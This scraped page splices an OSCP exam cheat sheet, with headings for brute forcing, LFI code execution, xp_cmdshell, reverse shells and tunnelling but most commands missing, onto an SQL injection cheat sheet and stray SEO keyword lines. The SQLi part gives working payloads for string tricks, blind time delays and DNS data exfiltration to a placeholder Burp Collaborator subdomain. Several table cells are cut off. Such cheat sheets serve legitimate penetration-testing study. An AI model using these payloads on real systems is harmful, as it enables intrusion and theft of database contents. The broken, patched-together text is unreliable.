February 28th, 2021 sql injection cheat sheet github. PWK course & the OSCP Exam Cheatsheet 6 minute read Forked from sinfulz “JustTryHarder” is his “cheat sheet which will aid you through the PWK course & the OSCP Exam.” So here: “ JustTryHarder. JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.
Studying from various sources for Offensive-Security OSCP. I would like to make my own cheatsheet for the exam.
Enumeration
Enumeration is most important part. All finding should be noted for future reference. Without enumeration, we will have hard time to exploit the target.
DNS Enumeration
Forward Lookup brute force to find ip addres of host:
Reverse Lookup to find hostname:
Zone transfer and enumeration using Kali tools
Enumerate using Nmap
Port Scanning and Service Enumeration
Filter all open ports for nmap script scanning:
Automated Enumeration Script
Download: https://github.com/21y4d/nmapAutomator
Other Enumeration Command
Pentesting Specific Service
Port 21(FTP) Open
Scan FTP with Nmap
Login and Upload backdoor
Port 22(SSH) Open
Banner Grab
Quick Brute Forces
Port 25(SMTP) Open
Enumerate Using netcat. Used for username Enumeration. Useful for brute forcing
Port 53(DNS) Open
Enumerating with nslookup,dig and gobuster:
Other tools to try:
Port 79(Finger) Open
If finger service is running, it is possible to enumerate username, and useful for brute force purpose.
Port 80/443(HTTP/HTTPS) Open
What to check?
- Manually Browse Common Files.
- Identify Technology. Search Vulnerability with identified info.
- Gather information from SSL.
- Check if it has any proxy related vulnerability.
- Directory, Sensitive files brute force and spider any discovered directory.
- May need to find out the hidden parameters.
- Find all inputs point.
- Find subdomains using dnsrecon or dnsenum.
View sources, and also Browse Manually
Identify Technology with whatWeb
Scan with Nikto
If any CMS identified
Brute Force Directory and Files
- First use small common wordlist
- Then Big Word list
- Try with CMS related wordlist
Word list File to brute forces:
Brute force with Gobuster
Password brute Forcing(wordpress example)
LFI and RFI
If the URL parameter has file name, we can try to vulnerability for LFI/RFI. We should request invalid file and see if any error is displayed!
LFI Can execute code!
Send our malicious code using CURL or Burpsuite or even netcat:
Now execute command:
Command Execution
If found any parameters or input fields, we can try for command execution. Test Every parameters and input fields with these payload(Better to use burp suite intruder):
Reference and more payload: https://github.com/payloadbox/command-injection-payload-list
SQLi for Login Bypass
If any login page found, should be tried to bypass password check. These payload copied from: https://github.com/payloadbox/sql-injection-payload-list
CheatSheet:
MSSQL INJECTION: https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/
MYSQL INJECTION: https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/
Exploit WebDav
If one method fail, another should be tested. If nothing work, Find different exploit!
Method 1:
Method 2:
Method 3:
Reference
File Inclusion: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
SQL Injection: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
Command Injection: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Port 110(POP3) Open
Found an user login information?
Port 111 (RPCINFO) Open
Connect with Null session.
Port 137,138,139 Open
Port 445(SMB) Open
There is a big chance getting sensitive information with SMB. Need to check everything carefully!
Enumerating SMB
Connecting to share without password(Anonymous login)
Login with Password
Port 389(LDAP) Open
Port 1433(MSSQL) Open
Reference: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
Quick brute for pass “SA” password
Connect to MSSQL Server:
Enable xp_cmdshell:
Execute System Command:
Port 2049(NFS) Open
Enumerate shares
Mount shares in Local Machine
After mounting the filesystem if don’t have read/write permission, we need to edit /etc/passwd and change UUID:
Now we can write files to the target fold of the network filesystem. For example:
Port 3306(MYSQL) Open
Port 3389(RDP) Open
Connect to RDP
Brute force if a valid username found:
Add user to RDP Group
Port 5900/5800(VNC) Open
Scan with nmap
Connect from Kali
Password Attack
Sometime we need to do password guessing(We should!). For better success rate we need a good password dictionary. Also we should search for default credential online!
I have collected some Username and password for quick brute force, usually used for CTF. These list could be used to exploit weak password. Uploaded in GitHub:
Default Username: https://raw.githubusercontent.com/bytefellow/pentest/master/common-username
Default Password: https://raw.githubusercontent.com/bytefellow/pentest/master/common-password
Common password
Generate Password with cewl
Brute Forcing with Burp
If it is an web form we can brute force in intruder and match grep. Some screenshot from burp suit:
To brute force web form with the hydra, we need to grab the post data from the burp suite carefully. Otherwise, we will get false positive and waste lots of time! I tried to brute force otrs and it worked.
Brute Force With Hydra
Vulnerability and Exploitation
I believe finding vulnerability for the OSCP exam machine would be simple and easy. All enumeration previously should be noted! Version detection using and Web CMS version is most important to find exploit.
Find Vulnerability with Nmap
Using Searchsploit
Find Exploits using Google
Three kind of search should be enough to find an working exploit
Working with Public Exploits
A public exploit might be coded in python, ruby, c/c++ or any other language. Before executing the exploit:
- Read the instruction Carefully.
- Edit Target address, Reverse connection ip and Ports.
Working with Shell
We may get shell, after exploiting some vulnerability. Now what?
Backdoor Files in Kali
Kali already has some web shell.
Quick Shell in Different language
Here it is: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Generate with metasploit
Upgrading Shell
Listening for Connection
Upgrading Shell when received connection!
Running Python http Server
Uploading Shell/File
After getting shell, we may need to upload additional files or stable backdoor.
Transfering file in Linux
Transfering file in Windows
Transfer file with impacket samba script
Piviot/Tunnel/Port Forwarding
- -L = Kali’s Port
- -R = Kali Port
- $ip:3306 is the port from target
Local Port Forwarding
Have SSH access with low privileges? and There are some ports open internally? Try Local Port Forwarding:
Remote Port Forwarding
No SSH Access but limited shell? Also some weird port is open? Upload plink and Try Remote port forward with plink
Connect to the the tunneled port:
Dynamic Port Forwarding(Socks4)
Dynamic Port Forwarding from victim machine(Socks Proxy):
With Dynamic Port Forwarding We can access/browse any ip range of the victim machine. We just need to configure proxychains.conf as follows:
Now we can use any application through proxychains… such as:
Port Forwarding with Plink.exe
Remote Port Forwarding using Plink. Needed When we don’t have access to specific port on on target box!
Common Issue
Correct permission for SSH Key?
Load key “id_rsa”: invalid format ?
Try Removing additional space. Also keep the public key in the same directory of private key. We may get the warning, but it should work!
Unable to negotiate with x.x.x.x … no matching key exchange method found
SSH Error:
Solutions:
Practical Exploitation
Exploiting NFS and FTP
I have done enumeration with nmapautomator. Found NFS and ProFtpd 1.3.5 is running. But no HTTP. The exploitation step was:
The network File system mounted but does not have any contents. FTP version is vulnerable. So i had to exploit it manually(https://www.exploit-db.com/exploits/36803):
This way, I was able to successfully exploit the system without directly using any tools!
Exploiting Jenkins Server
Was able to login as user admin and password admin. Then I have navigated to Manage Jenkins>>Script Console and pasted this code for reverse connection:
Clicked run and got shell!
More Example: https://www.bytefellow.com/quick-initial-foothold-in-10-htb-machine/
This SQL injection cheat sheet contains examples of useful syntax that you can use to perform a variety of tasks that often arise when performing SQL injection attacks.
You can concatenate together multiple strings to make a single string.
| database | example |
|---|---|
| Oracle | `’foo’ |
| Microsoft | 'foo'+'bar' |
| PostgreSQL | `’foo’ |
| MySQL | 'foo' 'bar' [Note the space between the two strings]CONCAT('foo','bar') |
You can use comments to truncate a query and remove the portion of the original query that follows your input.
| database | example |
|---|---|
| Oracle | --comment |
| Microsoft | --comment/*comment*/ |
| PostgreSQL | --comment/*comment*/ |
| MySQL | #comment-- comment [Note the space after the double dash]/*comment*/ |
You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.
| database | example |
|---|---|
| Oracle | SELECT banner FROM v$versionSELECT version FROM v$instance |
| Microsoft | SELECT @@version |
| PostgreSQL | SELECT version() |
| MySQL | SELECT @@version |
You can list the tables that exist in the database, and the columns that those tables contain.
| database | example |
|---|---|
| Oracle | SELECT * FROM all_tablesSELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |
| Microsoft | SELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| PostgreSQL | SELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| MySQL | SELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
You can test a single boolean condition and trigger a database error if the condition is true.
| database | example |
|---|---|
| Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual |
| Microsoft | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END |
| PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END |
| MySQL | SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') |
You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.
| database | example |
|---|---|
| Oracle | Does not support batched queries. |
| Microsoft | QUERY-1-HERE; QUERY-2-HERE |
| PostgreSQL | QUERY-1-HERE; QUERY-2-HERE |
| MySQL | Does not support batched queries. |
You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.
Sql Injection Cheat Sheet Owasp
| database | example |
|---|---|
| Oracle | dbms_pipe.receive_message(('a'),10) |
| Microsoft | WAITFOR DELAY '0:0:10' |
| PostgreSQL | SELECT pg_sleep(10) |
| MySQL | SELECT sleep(10) |
You can test a single boolean condition and trigger a time delay if the condition is true.
| database | example |
|---|---|
| Oracle | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN ‘a’ |
| Microsoft | IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10' |
| PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END |
| MySQL | SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a') |
You can cause the database to perform a DNS lookup to an external domain. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to confirm that a DNS lookup occurred.
| database | example |
|---|---|
| Oracle | The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:SELECT extractvalue(xmltype('<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [ <!ENTITY % remote SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/'> %remote;]>'),'/l') FROM dualThe following technique works on fully patched Oracle installations, but requires elevated privileges: SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net') |
| Microsoft | exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a' |
| PostgreSQL | copy (SELECT ') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net' |
| MySQL | The following techniques work on Windows only:LOAD_FILE('YOUR-SUBDOMAIN-HERE.burpcollaborator.neta')SELECT ... INTO OUTFILE 'YOUR-SUBDOMAIN-HERE.burpcollaborator.neta' |
You can cause the database to perform a DNS lookup to an external domain containing the results of an injected query. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to retrieve details of any DNS interactions, including the exfiltrated data.
| database | example |
|---|---|
| Oracle | `SELECT extractvalue(xmltype(‘<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://‘ |
| Microsoft | declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree '//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a') |
| PostgreSQL | create OR replace function f() returns void as $$ declare c text; declare p text; begin SELECT into p (SELECT YOUR-QUERY-HERE); c := ‘copy (SELECT ‘’’’) to program ‘’nslookup ‘ |
| MySQL | The following technique works on Windows only:SELECT YOUR-QUERY-HERE INTO OUTFILE 'YOUR-SUBDOMAIN-HERE.burpcollaborator.neta' |
SQL注入在不同数据库的表现,可表现在这些方面:
Mysql Sql Injection Cheat Sheet Github
- String concatenation 字符串连接
- Comments 注释
- Database version 数据库版本的查询
- Database contents 数据库内容的查询
- Conditional errors 条件错误
- Batched (or stacked) queries 批量查询
- Time delays 时间延迟
- Conditional time delays 有条件的时间延迟
- DNS lookup DNS查询
DNS lookup with data exfiltration 使用数据泄露进行DNS查找